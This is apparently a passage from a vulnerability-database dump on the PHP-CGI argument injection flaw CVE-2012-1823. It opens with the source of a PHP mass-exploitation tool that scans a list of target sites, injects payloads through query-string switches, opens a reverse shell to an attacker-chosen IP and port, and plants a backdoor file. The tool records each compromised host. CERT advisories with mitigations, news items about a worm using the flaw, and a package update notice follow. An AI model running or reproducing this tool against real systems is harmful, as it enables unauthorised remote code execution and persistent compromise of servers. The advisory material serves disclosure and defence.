\r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p align=&quot;center&quot;&gt; &lt;span class=&quot;Stile5&quot;&gt;&lt;font \r\ncolor=&quot;#FF0000&quot;&gt;* &lt;/font&gt;&lt;font color=&quot;white&quot; &gt;fields are \r\nrequired&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;/br&gt;\r\n &lt;p align=&quot;center&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Start Attack&quot; \r\nname=&quot;Submit&quot;&gt;&lt;/p&gt;\r\n &lt;/form&gt; &lt;/td&gt;\r\n &lt;td&gt;&lt;/td&gt;\r\n &lt;td&gt;&lt;form name=&quot;form1&quot; action=&quot;&#39;.$SERVER[PHP_SELF].&#39;&quot; \r\nenctype=&quot;multipart/form-data&quot; method=&quot;post&quot;&gt;\r\n &lt;/br&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; hostname &#40;ex: \r\nwww.sitename.com&#41;:&lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;host&quot; size=&quot;20&quot;&gt; &lt;span \r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p&gt;&lt;/font&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; Your IP &#40;ex: \r\n173.194.35.169 &#41;: &lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;lip&quot; size=&quot;20&quot;&gt; \r\n&lt;span class=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;p&gt;&lt;font color=&quot;#FFF8C6&quot; &gt; Your Port &#40;ex: \r\n80&#41;:&lt;/font&gt;&lt;/br&gt;&lt;input name=&quot;lport&quot; size=&quot;20&quot;&gt; &lt;span \r\nclass=&quot;Stile5&quot;&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;/br&gt;&lt;/br&gt;\r\n &lt;p align=&quot;center&quot;&gt; &lt;span class=&quot;Stile5&quot;&gt;&lt;font \r\ncolor=&quot;#FF0000&quot;&gt;All &lt;/font&gt;&lt;font color=&quot;white&quot; &gt;fields are \r\nrequired&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;\r\n &lt;/br&gt;\r\n &lt;p align=&quot;center&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Start Attack&quot; \r\nname=&quot;Submit2&quot;&gt;&lt;/p&gt;\r\n &lt;/form&gt; &lt;/td&gt;\r\n &lt;/tr&gt;\r\n&lt;/table&gt;\r\n&lt;/font&gt;\r\n&lt;table width=&quot;90&#37;&quot;&gt;\r\n &lt;tbody&gt;\r\n &lt;tr&gt;\r\n &lt;td width=&quot;43&#37;&quot; align=&quot;left&quot;&gt;\r\n\r\n &lt;/td&gt;\r\n &lt;/tr&gt;\r\n &lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/body&gt;&lt;/html&gt;&#39;;\r\n\r\n $host = $_POST[&#39;host&#39;];\r\n $lip = $_POST[&#39;lip&#39;];\r\n $lport = $_POST[&#39;lport&#39;];\r\n $port = $_POST[&#39;port&#39;];\r\n $proxy = $_POST[&#39;proxy&#39;];\r\n $list = file&#40;$_FILES[&#39;listfile&#39;][&#39;tmp_name&#39;]&#41;;\r\n $file = \r\nbase64_encode&#40;gzdeflate&#40;file_get_contents&#40;$_FILES[&#39;datafile&#39;][&#39;tmp_name&#39;]&#41;&#41;&#41;;\r\n $shell = &quot;gzinflate&#40;base64_decode&#40;&#92;&quot;$file&#92;&quot;&#41;&#41;&quot;;\r\n\r\nif &#40;isset&#40;$_POST[&#39;Submit2&#39;]&#41; &amp;&amp; $host != &#39;&#39; &amp;&amp; $lip != &#39;&#39; &amp;&amp; $lport != &#39;&#39;&#41;\r\n{\r\n /*pentestmonkey&#39;s php-reverse-shell.\r\n Limitations: proc_open and stream_set_blocking require PHP version \r\n4.3+, or 5+ */\r\n\r\n /* Connect Back */\r\n\r\n $payload = &quot;&lt;?php set_time_limit &#40;0&#41;; &#92;$VERSION = &#92;&quot;1.0&#92;&quot;; &#92;$ip = \r\n&#39;$lip&#39;; &#92;$port = $lport; &#92;$chunk_size = 1400; &#92;$write_a = null; \r\n&#92;$error_a = null; &#92;$shell = &#39;uname -a; w; id; /bin/sh -i&#39;; &#92;$daemon = \r\n0;&#92;$debug = 0; if &#40;function_exists&#40;&#39;pcntl_fork&#39;&#41;&#41; { &#92;$pid = \r\npcntl_fork&#40;&#41;; if &#40;&#92;$pid == -1&#41; { printit&#40;&#92;&quot;ERROR: Can&#39;t fork&#92;&quot;&#41;; \r\nexit&#40;1&#41;;} if &#40;&#92;$pid&#41; { exit&#40;0&#41;;} if &#40;posix_setsid&#40;&#41; == -1&#41; { \r\nprintit&#40;&#92;&quot;Error: Can&#39;t setsid&#40;&#41;&#92;&quot;&#41;; exit&#40;1&#41;; } &#92;$daemon = 1;} else { \r\nprintit&#40;&#92;&quot;WARNING: Failed to daemonise. This is quite common and not \r\nfatal.&#92;&quot;&#41;;}chdir&#40;&#92;&quot;/&#92;&quot;&#41;; umask&#40;0&#41;; &#92;$sock = fsockopen&#40;&#92;$ip, &#92;$port, \r\n&#92;$errno, &#92;$errstr, 30&#41;;if &#40;!&#92;$sock&#41; { printit&#40;&#92;&quot;&#92;$errstr &#40;&#92;$errno&#41;&#92;&quot;&#41;; \r\nexit&#40;1&#41;;} &#92;$descriptorspec = array&#40;0 =&gt; array&#40;&#92;&quot;pipe&#92;&quot;, &#92;&quot;r&#92;&quot;&#41;,1 =&gt; \r\narray&#40;&#92;&quot;pipe&#92;&quot;, &#92;&quot;w&#92;&quot;&#41;, 2 =&gt; array&#40;&#92;&quot;pipe&#92;&quot;, &#92;&quot;w&#92;&quot;&#41;&#41;;&#92;$process = \r\nproc_open&#40;&#92;$shell, &#92;$descriptorspec, &#92;$pipes&#41;;if \r\n&#40;!is_resource&#40;&#92;$process&#41;&#41; { printit&#40;&#92;&quot;ERROR: Can&#39;t spawn shell&#92;&quot;&#41;; \r\nexit&#40;1&#41;;}stream_set_blocking&#40;&#92;$pipes[0], \r\n0&#41;;stream_set_blocking&#40;&#92;$pipes[1], 0&#41;;stream_set_blocking&#40;&#92;$pipes[2], \r\n0&#41;;stream_set_blocking&#40;&#92;$sock, 0&#41;;printit&#40;&#92;&quot;Successfully opened \r\nreverse shell to &#92;$ip:&#92;$port&#92;&quot;&#41;; while &#40;1&#41; { if &#40;feof&#40;&#92;$sock&#41;&#41; { \r\nprintit&#40;&#92;&quot;ERROR: Shell connection terminated&#92;&quot;&#41;; break;} if \r\n&#40;feof&#40;&#92;$pipes[1]&#41;&#41; {printit&#40;&#92;&quot;ERROR: Shell process \r\nterminated&#92;&quot;&#41;;break;}&#92;$read_a = array&#40;&#92;$sock, &#92;$pipes[1], \r\n&#92;$pipes[2]&#41;;&#92;$num_changed_sockets = stream_select&#40;&#92;$read_a, &#92;$write_a, \r\n&#92;$error_a, null&#41;;if &#40;in_array&#40;&#92;$sock, &#92;$read_a&#41;&#41; {if &#40;&#92;$debug&#41; \r\nprintit&#40;&#92;&quot;SOCK READ&#92;&quot;&#41;;&#92;$input = fread&#40;&#92;$sock, \r\n&#92;$chunk_size&#41;;if&#40;&#92;$debug&#41; printit&#40;&#92;&quot;SOCK: \r\n&#92;$input&#92;&quot;&#41;;fwrite&#40;&#92;$pipes[0], &#92;$input&#41;;}if &#40;in_array&#40;&#92;$pipes[1], \r\n&#92;$read_a&#41;&#41; {if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDOUT READ&#92;&quot;&#41;;&#92;$input = \r\nfread&#40;&#92;$pipes[1], &#92;$chunk_size&#41;;if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDOUT: \r\n&#92;$input&#92;&quot;&#41;;fwrite&#40;&#92;$sock, &#92;$input&#41;;}if &#40;in_array&#40;&#92;$pipes[2], \r\n&#92;$read_a&#41;&#41; {if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDERR READ&#92;&quot;&#41;;&#92;$input = \r\nfread&#40;&#92;$pipes[2], &#92;$chunk_size&#41;; if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDERR: \r\n&#92;$input&#92;&quot;&#41;;fwrite&#40;&#92;$sock, \r\n&#92;$input&#41;;}}fclose&#40;&#92;$sock&#41;;fclose&#40;&#92;$pipes[0]&#41;;fclose&#40;&#92;$pipes[1]&#41;;fclose&#40;&#92;$pipes[2]&#41;;proc_close&#40;&#92;$process&#41;;function printit &#40;&#92;$string&#41; {if &#40;!&#92;$daemon&#41; {print &#92;&quot;&#92;$string&#92;n&#92;&quot;;}} \r\n?&gt;&quot;;\r\n $packet = &quot;POST \r\n&quot;.$p.&quot;/?-d+allow_url_include&#37;3d1+-d+auto_prepend_file&#37;3dphp://input \r\nHTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: PHP CGI Argument Injection Exploiter&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Type: application/x-www-form-urlencoded&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Length: &quot;.strlen&#40;$payload&#41;.&quot;&#92;r&#92;n&#92;r&#92;n&quot;;\r\n $packet .= $payload.&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n\r\n}elseif &#40;isset&#40;$_POST[&#39;Submit&#39;]&#41; &amp;&amp; $list != &#39;&#39; &amp;&amp; $file != &#39;&#39;&#41;\r\n{\r\n if &#40;$port==&#39;&#39;&#41; {$port=80;}\r\n\r\n for &#40;$n =0; $n &lt; count&#40;$list&#41;; $n++&#41;\r\n {\r\n\r\n $siteAddbackup = $list[$n];\r\n $siteAdd=str_replace&#40;&quot;http://&quot;,&quot;&quot;,$siteAddbackup&#41;;\r\n \r\npreg_match&#40;&#39;/^&#40;?:&#40;?:http|https&#41;:&#92;/&#92;/&#41;?[^&#92;/]+&#40;&#92;/.+&#92;/&#41;[^&#92;/&#92;.]+&#92;.[^&#92;/&#92;.]+$/i&#39;,$siteAddbackup, \r\n$match&#41;;\r\n $path = $match[1];\r\n $pa = strstr&#40;trim&#40;$siteAdd&#41;,$path&#41;;\r\n $host=trim&#40;str_replace&#40;$pa,&quot;&quot;,$siteAdd&#41;&#41;;\r\n if &#40;$path ==&#39;&#39;&#41;{$path = &quot;/&quot;; }\r\n if &#40;$proxy==&#39;&#39;&#41; {$p=$path;} else {$p=&#39;http://&#39;.$host.$path;}\r\n\r\n /* Checking \r\nAvailability */\r\n\r\n $connection = fsockopen&#40;$host,$port&#41;;\r\n if &#40;!$connection&#41;\r\n // site is down\r\n {\r\n echo &#39;&lt;font color=red&gt; No response from \r\n&#39;.htmlentities&#40;$host&#41;.&#39; ...&lt;br&gt;&lt;/font&gt;&#39;;\r\n \r\nfile_put_contents&#40;realpath&#40;dirname&#40;__FILE__&#41;&#41;.&#39;/notconnected.txt&#39;, \r\n$siteAddbackup.&quot;&#92;r&#92;n&quot;, FILE_APPEND&#41;;\r\n }\r\n else\r\n // site is up\r\n {\r\n fclose&#40;$connection&#41;;\r\n Exploitable&#40;$host,$path,$p&#41;;\r\n }\r\n\r\n}\r\n}\r\n\r\nFunction Exploitable&#40;$host,$path,$p&#41;\r\n{\r\n global $html;\r\n $i=0;\r\n /* Checking Exploitability */\r\n $packet = &quot;GET &quot;.$p.&quot;?-s HTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: PHP CGI Argument Injection Exploiter &#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n $str = array&#40;\r\n &#39;&lt;code&gt;&lt;span&#39;,&#39;&amp;lt;?&#39;&#41;;\r\n foreach &#40;$str as $value =&gt; $search&#41;{\r\n if&#40;stristr&#40;$html, $search&#41; == TRUE&#41;\r\n {$i=$i+1;}}\r\n switch&#40;$i&#41;\r\n {\r\n case 0:\r\n echo &#39;&lt;font color=red&gt;&#39;.$host.&#39; Faild!&lt;br&gt;&lt;/font&gt;&#39;;\r\n break;\r\n case 2:\r\n echo &#39;&lt;font color=#FFF8C6&gt;&#39;.$host.&#39; Exploitable&lt;br&gt;&lt;/font&gt;&#39;;\r\n Exploit&#40;$host,$path,$p&#41;;\r\n }\r\n}\r\n\r\nFunction Exploit&#40;$host,$path,$p&#41;\r\n{\r\nglobal $html, $shell;\r\n /* Exploiting */\r\n\r\n $payload = &quot;&lt;?php &#92;$myFile = &#92;&quot;legalpentest.php&#92;&quot;; &#92;$filehandle = \r\nfopen&#40;&#92;$myFile, &#39;w&#39;&#41; or die&#40;&#92;&quot;can&#39;t open file&#92;&quot;&#41;; &#92;$Data=$shell; \r\nfwrite&#40;&#92;$filehandle, &#92;$Data&#41;;fclose&#40;&#92;$filehandle&#41;;&quot;;\r\n $packet = &quot;POST \r\n&quot;.$p.&quot;/?-d+allow_url_include&#37;3d1+-d+auto_prepend_file&#37;3dphp://input \r\nHTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: PHP CGI Argument Injection Exploiter&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Type: application/x-www-form-urlencoded&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Length: &quot;.strlen&#40;$payload&#41;.&quot;&#92;r&#92;n&#92;r&#92;n&quot;;\r\n $packet .= $payload.&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n /* Check for successfully \r\nuploaded */\r\n $packet = &quot;HEAD &quot;.$p.&quot;/legalpentest.php HTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: :&#41; &#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n\r\n if&#40;stristr&#40;$html , &#39;404 Not Found&#39;&#41; == true&#41;\r\n {\r\n echo &#39;&lt;font color=#FFF8C6&gt;&lt;br&gt;Exploit \r\nFaild...&lt;br&gt;-------------------------------------------------------&lt;br&gt;&lt;/font&gt;&#39;;\r\n }\r\n else {\r\n echo &quot;&lt;font color=#FFF8C6&gt;&lt;br&gt;Exploit \r\nSucceeded...&lt;br&gt;http://$host$path&quot;.&quot;/legalpentest.php&lt;br&gt;-------------------------------------------------------&lt;br&gt;&lt;/font&gt;&quot;;\r\n file_put_contents&#40;realpath&#40;dirname&#40;__FILE__&#41;&#41;.&#39;/shell.txt&#39;, \r\n&quot;http://$host$path&quot;.&quot;/legalpentest.php&#92;r&#92;n&quot;, FILE_APPEND&#41;;\r\n }\r\n}\r\n\r\n\r\nfunction sendpacket&#40;$packet,$response = 0,$output = 0,$s=0&#41;\r\n{\r\n $proxy_regex = &#39;&#40;&#92;b&#92;d{1,3}&#92;.&#92;d{1,3}&#92;.&#92;d{1,3}&#92;.&#92;d{1,3}&#92;:&#92;d{1,5}&#92;b&#41;&#39;;\r\n global $proxy, $host, $port, $html, $user, $pass;\r\n if &#40;$proxy == &#39;&#39;&#41;\r\n {\r\n $ock = fsockopen&#40;$host,$port&#41;;\r\n stream_set_timeout&#40;$ock, 5&#41;;\r\n if &#40;!$ock&#41;\r\n {\r\n echo &#39;No response from &#39;.htmlentities&#40;$host&#41;.&#39; ...&lt;br&gt;&#39;;\r\n stream_set_timeout&#40;$ock, 4&#41;;\r\n }\r\n } else\r\n {\r\n $parts = explode&#40;&#39;:&#39;,$proxy&#41;;\r\n // echo &#39;&lt;font color=white&gt;Connecting to proxy: \r\n&#39;.$parts[0].&#39;:&#39;.$parts[1].&#39; ...&lt;br&gt;&lt;br/&gt;&lt;/font&gt;&#39;;\r\n $ock = fsockopen&#40;$parts[0],$parts[1]&#41;;\r\n stream_set_timeout&#40;$ock, 5&#41;;\r\n if &#40;!$ock&#41;\r\n {\r\n echo &#39;No response from proxy...&lt;br&gt;&#39;;\r\n fclose&#40;$ock&#41;;\r\n }\r\n }\r\n\r\n if &#40;$ock&#41;\r\n {\r\n fputs&#40;$ock,$packet&#41;;\r\n if &#40;$response == 1&#41;\r\n {\r\n if &#40;$proxy == &#39;&#39;&#41;\r\n {\r\n $html = &#39;&#39;;\r\n while &#40;!feof&#40;$ock&#41;&#41;\r\n {\r\n $html .= fgets&#40;$ock&#41;;\r\n }\r\n } else\r\n {\r\n $html = &#39;&#39;;\r\n while &#40;&#40;!feof&#40;$ock&#41;&#41; or \r\n&#40;!eregi&#40;chr&#40;0x0d&#41;.chr&#40;0x0a&#41;.chr&#40;0x0d&#41;.chr&#40;0x0a&#41;,$html&#41;&#41;&#41;\r\n {\r\n $html .= fread&#40;$ock,1&#41;;\r\n }\r\n }\r\n } else $html = &#39;&#39;;\r\n\r\n fclose&#40;$ock&#41;;\r\n }\r\n}\r\n?&gt;\r\n", "modified": "2012-05-24T00:00:00", "published": "2012-05-24T00:00:00", "id": "SECURITYVULNS:DOC:28089", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28089", "title": "PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2019-10-09T19:49:38", "bulletinFamily": "info", "description": "### Overview \n\nParallels Plesk Panel versions 9.0 - 9.2.3 on Linux platforms are vulnerable to remote code execution.\n\n### Description \n\nParallels Plesk Panel versions 9.0 - 9.2.3 on Linux platforms may be exploited by a combination of [CVE-2012-1823](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>) and the Plesk phppath script alias usage. There have been reports that this vulnerability is being exploited in the wild. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to run arbitrary code under the context of the web server user. \n \n--- \n \n### Solution \n\n**Apply an Update**\n\nParallels Plesk Panel 9.0 - 9.2.3 have been considered [end-of-life](<http://www.parallels.com/products/plesk/lifecycle>) software for over 3 years. Users should upgrade to at least 9.5.4 or later. Parallels will provide additional workaround mitigations in[ Knowledge base article 116241](<http://kb.parallels.com/116241>) soon. \n \nPlease consider the following workarounds if you are unable to upgrade. \n \n--- \n \n**Update PHP** \n \n[Update PHP](<http://www.php.net/archive/2012.php#id2012-05-03-1>) to protect against CVE-2012-1823. \n \n**Restrict Access** \n \nDo not allow untrusted networks to connect to the Plesk Panel. \n \n--- \n \n### Vendor Information\n\n673343\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Parallels Holdings Ltd\n\nNotified: June 06, 2013 Updated: June 07, 2013 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.5 | E:H/RL:OF/RC:C \nEnvironmental | 4.9 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://kb.parallels.com/116241>\n * <http://kb.parallels.com/en/113818>\n * <http://www.parallels.com/products/plesk/lifecycle>\n * <http://seclists.org/fulldisclosure/2013/Jun/21>\n * <http://blogs.cisco.com/security/plesk-0-day-targets-web-servers/>\n * <http://kb.parallels.com/en/113814>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>\n\n### Acknowledgements\n\nKingcope published an exploit for this vulnerability to the Full Disclosure mailing list.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-1823](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823>) \n---|--- \n**Date Public:** | 2013-06-05 \n**Date First Published:** | 2013-06-07 \n**Date Last Updated: ** | 2013-06-07 16:19 UTC \n**Document Revision: ** | 15 \n", "modified": "2013-06-07T16:19:00", "published": "2013-06-07T00:00:00", "id": "VU:673343", "href": "https://www.kb.cert.org/vuls/id/673343", "type": "cert", "title": "Parallels Plesk Panel phppath/php vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-09T19:49:57", "bulletinFamily": "info", "description": "### Overview \n\nPHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files.\n\n### Description \n\nAccording to PHP's [website](<http://php.net/>), \"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.\" When PHP is used in a CGI-based setup (such as Apache's `mod_cgid`), the `php-cgi` receives a processed query string parameter as command line arguments which allows command-line switches, such as `-s, -d or -c` to be passed to the `php-cgi` binary, which can be exploited to disclose source code and obtain arbitrary code execution.\n\nAn example of the `-s` command, allowing an attacker to view the source code of `index.php` is below: \n`<http://localhost/index.php?-s>` \n \nAdditional information can be found in the vulnerability reporter's [blog post](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>). \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server. \n \n--- \n \n### Solution \n\n**Apply update** \n \nPHP has released version [5.4.3](<http://www.php.net/archive/2012.php#id2012-05-08-1>) and [5.3.13](<http://www.php.net/archive/2012.php#id2012-05-08-1>) to address this vulnerability. PHP is recommending that users upgrade to the latest version of PHP. \n \nPHP has stated, _PHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use $* instead of \"$@\" to pass parameters to php-cgi which causes a number of issues._ \n \n--- \n \n**Apply mod_rewrite rule** \n \n_PHP has _[_stated _](<http://www.php.net/archive/2012.php#id2012-05-03-1>)_an alternative is to configure your web server to not let these types of requests with query strings starting with a \"-\" and not containing a \"=\" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this_: \n \n` RewriteCond %{QUERY_STRING} ^[^=]*$` \n` RewriteCond %{QUERY_STRING} %2d|\\- [NC]` \n` RewriteRule .? - [F,L]` \n \n--- \n \n### Vendor Information\n\nAccording to PHP's [website](<http://www.php.net/archive/2012.php#id2012-05-03-1>) _Apache+mod_php and nginx+php-fpm are not affected._ \n \n--- \n \n520827\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ The PHP Group\n\nNotified: February 23, 2012 Updated: May 08, 2012 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://php.net/ChangeLog-5.php>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.0 | AV:N/AC:L/Au:N/C:C/I:P/A:P \nTemporal | 8.5 | E:F/RL:U/RC:C \nEnvironmental | 8.7 | CDP:L/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.php.net/>\n * <http://www.php.net/manual/en/security.cgi-bin.php>\n * <http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices>\n\n### Acknowledgements\n\nThanks to De Eindbazen for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-1823, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823>) [CVE-2012-2311](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2311>) \n---|--- \n**Date Public:** | 2012-05-03 \n**Date First Published:** | 2012-05-03 \n**Date Last Updated: ** | 2013-12-02 04:26 UTC \n**Document Revision: ** | 49 \n", "modified": "2013-12-02T04:26:00", "published": "2012-05-03T00:00:00", "id": "VU:520827", "href": "https://www.kb.cert.org/vuls/id/520827", "type": "cert", "title": "PHP-CGI query string parameter vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "description": "None\n", "modified": "2013-11-30T20:08:11", "published": "2013-11-30T09:08:00", "id": "THN:F0587F0EFE1B937682CDBA5338BDE708", "href": "http://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html", "type": "thn", "title": "Linux worm targeting Routers, Set-top boxes and Security Cameras with PHP-CGI Vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-27T09:17:56", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-XAsXMXrVRn4/Uyqy3GL-9EI/AAAAAAAAatg/T1_l1UZYSNI/s1600/Linux-malware-Internet-of-Things-security-app.png>)\n\nCould a perfectly innocent looking device like router, TV set-top box or security cameras can mine Bitcoins? YES! Hackers will not going to spare the Smart Internet-enabled devices.\n\n \n\n\nA Linux worm named **_Linux.Darlloz_**, earlier used to target _Internet of Things (IoT)_ devices, i.e. Home Routers, Set-top boxes, Security Cameras, printers and Industrial control systems; now have been upgraded to mine Crypto Currencies like Bitcoin.\n\n \n\n\nSecurity Researcher at Antivirus firm [Symantec](<http://www.symantec.com/connect/blogs/iot-worm-used-mine-cryptocurrency>) spotted the Darlloz Linux worm back in November and they have spotted the latest variant of the worm in mid-January this year.\n\n \n\n\n_Linux.Darlloz_ worm exploits a PHP vulnerability (__[CVE-2012-1823](<https://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html>)__) to propagate and is capable to infect devices those run Linux on Intel\u2019s x86 chip architecture and other embedded device architectures such as PPC, MIPS and MIPSEL.\n\n \n\n\nThe latest variant of _Linux.Darlloz_ equipped with an open source crypto currency mining tool called '_[cpuminer](<https://sourceforge.net/projects/cpuminer/>)_', could be used to mine Mincoins, Dogecoins or [Bitcoins](<https://thehackernews.com/search/label/Bitcoin>).\n\n \n\n\nSymantec Researchers scanned the entire address space of the Internet and found 31,716 devices infected with Darlloz. \"_By the end of February 2014, the attacker mined 42,438 Dogecoins (approximately US$46 at the time of writing) and 282 Mincoins (approximately US$150 at the time of writing). These amounts are relatively low for the average cybercrime activity so, we expect the attacker to continue to evolve their threat for increased monetization._\" Kaoru Hayashi, senior development manager and threat analyst with Symantec in Japan.\n\n \n\n\nMajor infected countries are China, the U.S., South Korea, Taiwan and India.\n\n[](<https://1.bp.blogspot.com/-EtVgrEz1c3o/UyqcCffn2-I/AAAAAAAAas8/tx2Irf9tGFA/s1600/Darlloz-hack-malware.png>)\n\nCrypto Currency typically requires more memory and a powerful CPUs, so the [malware](<https://thehackernews.com/search/label/Malware>) could be updated to target other IoT devices in the future, such as home automation devices and wearable technology. \n \nA Few weeks back, Cisco has announced a global and industry-wide initiative to bring the Security community and Researchers together to contribute in securing the Internet of Things (IoT) and launched a contest called the \"**[Internet of Things Grand Security Challenge](<https://thehackernews.com/2014/03/Internet-of-Things-Security-Apps.html>)**\", offering prizes of up to $300,000 for winners.\n\n \n\n\nUsers are advised to update firmware and apply security patches for all software installed on computers or Internet-enabled devices. Make sure, you are not using default username or password for all devices and block port 23 or 80 from outside if not required.\n", "modified": "2014-03-20T09:28:58", "published": "2014-03-19T22:26:00", "id": "THN:26139DCDB80F29AA56F9DB9ADFBD986B", "href": "https://thehackernews.com/2014/03/linux-worm-targets-internet-enabled.html", "type": "thn", "title": "Linux Worm targets Internet-enabled Home appliances to Mine Cryptocurrencies", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2019-05-29T17:22:26", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter. ([CVE-2012-1823 __](<https://access.redhat.com/security/cve/CVE-2012-1823>))\n\n \n**Affected Packages:** \n\n\nphp\n\n \n**Issue Correction:** \nRun _yum update php_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php-dba-5.3.13-1.20.amzn1.i686 \n php-process-5.3.13-1.20.amzn1.i686 \n php-mysql-5.3.13-1.20.amzn1.i686 \n php-xml-5.3.13-1.20.amzn1.i686 \n php-pdo-5.3.13-1.20.amzn1.i686 \n php-snmp-5.3.13-1.20.amzn1.i686 